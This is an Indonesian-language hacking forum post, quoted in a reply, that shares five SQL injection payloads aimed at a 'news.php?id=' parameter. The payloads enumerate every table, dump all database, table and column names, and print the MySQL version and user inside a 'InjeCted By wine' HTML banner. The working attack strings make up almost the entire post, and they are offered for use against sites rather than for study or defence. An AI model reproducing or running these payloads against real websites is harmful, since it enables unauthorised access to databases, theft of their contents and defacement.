[Share] Playing With SQLi Output
#14
(04-12-2014, 12:58 PM)wine trochanter Wrote: Assalamualaikum, numpang share Big Grin

#PART 1
Menampilkan semua table dalam database

target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),3,4,5,6-- -
Spoiler! :


#PART 2
Menampilkan seluruh database, table dan column dalam satu perintah

target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2f,table_name,0x2f,column_name))))x),3,4,5,6-- -
Spoiler! :


#PART 3
Menampilkan semua table dengan memberi nomor urutan

target/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (@running_number:=0),(select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,@running_number:=@running_number+1,0x2e20,table_name))))x),3,4,5,6-- -
Spoiler! :


#PART 4
Menampilkan versi mysql dan nama kita menggunakan tag dengan html

target/news.php?id=90' div 0 UniOn SeleCt 1,concat('<b><font color=green size=4><center>InjeCted By wine<br><font color=blue>MySql Version :: <font color=red>',@@version),3,4,5,6-- -
Spoiler! :


#PART 5
Menampilkan dan membuat table

/news.php?id=90' div 0 UniOn SeleCt 1,concat(0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20,version(),0x3c7461626c6520626f726465723d313e3c74723e3c74643e557365723c2f74643e3c74643e,user(),0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c2f7461626c653e),3,4,5,6-- -
Spoiler! :


Okay sampai disini dulu, semoga bermanfaat. See u next time
thx to G_26 and Ajkaro \m/\m/\m/

kurang begitu ngerti tentang sql tapi nice lah buat pembelajaran hehe makasih ilmunya bro....


Messages In This Thread
Playing With SQLi Output - by wine trochanter - 04-12-2014, 12:58 PM
RE: Playing With SQLi Output - by cyberly - 04-16-2014, 11:52 AM
RE: Playing With SQLi Output - by wine trochanter - 04-16-2014, 10:30 PM
RE: Playing With SQLi Output - by ./exsucks - 04-17-2014, 05:16 PM
RE: Playing With SQLi Output - by iKONspirasi - 04-18-2014, 09:08 AM
RE: Playing With SQLi Output - by wine trochanter - 04-18-2014, 10:52 AM
RE: Playing With SQLi Output - by iKONspirasi - 04-18-2014, 08:08 PM
RE: Playing With SQLi Output - by wine trochanter - 04-18-2014, 08:17 PM
RE: Playing With SQLi Output - by iKONspirasi - 04-18-2014, 08:27 PM
RE: Playing With SQLi Output - by wine trochanter - 04-18-2014, 08:59 PM
RE: Playing With SQLi Output - by wahyuardan - 04-18-2014, 08:26 PM
RE: Playing With SQLi Output - by abdilahrf - 04-20-2014, 11:19 AM
RE: Playing With SQLi Output - by rahmadkur1 - 06-05-2014, 09:23 PM
RE: Playing With SQLi Output - by dimascyber4rt - 06-06-2014, 06:08 PM




Users browsing this thread: 1 Guest(s)